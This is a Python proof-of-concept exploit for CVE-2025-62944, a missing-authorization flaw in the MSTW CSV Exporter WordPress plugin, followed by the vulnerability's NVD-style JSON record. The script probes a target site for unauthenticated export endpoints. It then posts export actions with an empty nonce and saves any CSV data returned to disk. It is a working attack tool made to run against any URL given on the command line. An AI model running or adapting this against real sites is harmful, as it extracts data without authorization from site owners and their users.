CVE-2025-62944

# CVE-2025-62944 PoC - MSTW CSV Exporter Missing Authorization # Target: WordPress site with MSTW CSV Exporter plugin <= 1.4 import requests import sys def check_vulnerability(target_url): """ Check if target WordPress site is vulnerable to CVE-2025-62944 """ # Common export endpoints for MSTW CSV Exporter endpoints = [ '/wp-admin/admin-ajax.php?action=mstw_csv_export', '/wp-admin/admin-ajax.php?action=mstw_export_csv', '/wp-admin/admin-ajax.php?action=export_csv_data', '/wp-content/plugins/mstw-csv-exporter/export.php', '/wp-content/plugins/mstw-csv-exporter/includes/export.php' ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) # Check if export functionality is accessible if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'csv' in content_type or 'text/csv' in content_type: print(f"[!] VULNERABLE: {url}") print(f" Content-Type: {content_type}") print(f" Response size: {len(response.content)} bytes") vulnerable = True elif 'json' in content_type and 'error' not in response.text.lower(): print(f"[*] Possible export endpoint: {url}") print(f" Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") return vulnerable def exploit_export(target_url): """ Exploit CVE-2025-62944 to export CSV data without authentication """ export_url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' # Try different export actions actions = [ 'mstw_csv_export', 'mstw_export_csv', 'mstw_csv_exporter_export' ] for action in actions: try: data = { 'action': action, 'nonce': '' # No nonce required due to missing authorization } response = requests.post(export_url, data=data, timeout=10, verify=False) if response.status_code == 200: if 'csv' in response.headers.get('Content-Type', ''): # Save exported data filename = f"export_{action}.csv" with open(filename, 'wb') as f: f.write(response.content) print(f"[!] Exported data saved to: {filename}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve_2025_62944_poc.py <target_url>") print("Example: python cve_2025_62944_poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning target: {target}") print(f"[*] Checking for CVE-2025-62944 vulnerability...\n") if check_vulnerability(target): print("\n[*] Attempting to exploit and export data...") exploit_export(target) else: print("\n[-] Target does not appear to be vulnerable")

{"cve": {"id": "CVE-2025-62944", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:54.547", "lastModified": "2026-04-27T17:16:36.857", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mark O'Donnell MSTW CSV EXPORTER mstw-csv-exporter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MSTW CSV EXPORTER: from n/a through <= 1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/mstw-csv-exporter/vulnerability/wordpress-mstw-csv-exporter-plugin-1-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}